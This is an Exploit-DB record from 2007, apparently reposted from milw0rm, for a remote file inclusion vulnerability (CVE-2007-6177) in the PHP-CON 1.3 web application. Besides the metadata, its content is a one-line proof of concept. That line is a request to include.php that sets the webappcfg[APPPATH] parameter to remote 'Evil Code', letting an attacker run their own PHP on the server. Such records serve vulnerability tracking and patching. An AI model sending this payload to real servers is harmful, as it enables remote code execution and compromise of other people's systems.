PHP-CON 1.3 include.php Remote File Inclusion Vulnerability

2007-11-28T00:00:00
ID EDB-ID:4670
Type exploitdb
Reporter GoLd_M
Modified 2007-11-28T00:00:00

Description

PHP-CON 1.3 (include.php) Remote File Inclusion Vulnerability. CVE-2007-6177. Webapps exploit for php platform

                                        
                                            PHP-CON v1.3 (include.php)Remote File Inclusion Vulnerability
Script : http://sourceforge.net/project/showfiles.php?group_id=182182
POC :
/PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code

# milw0rm.com [2007-11-28]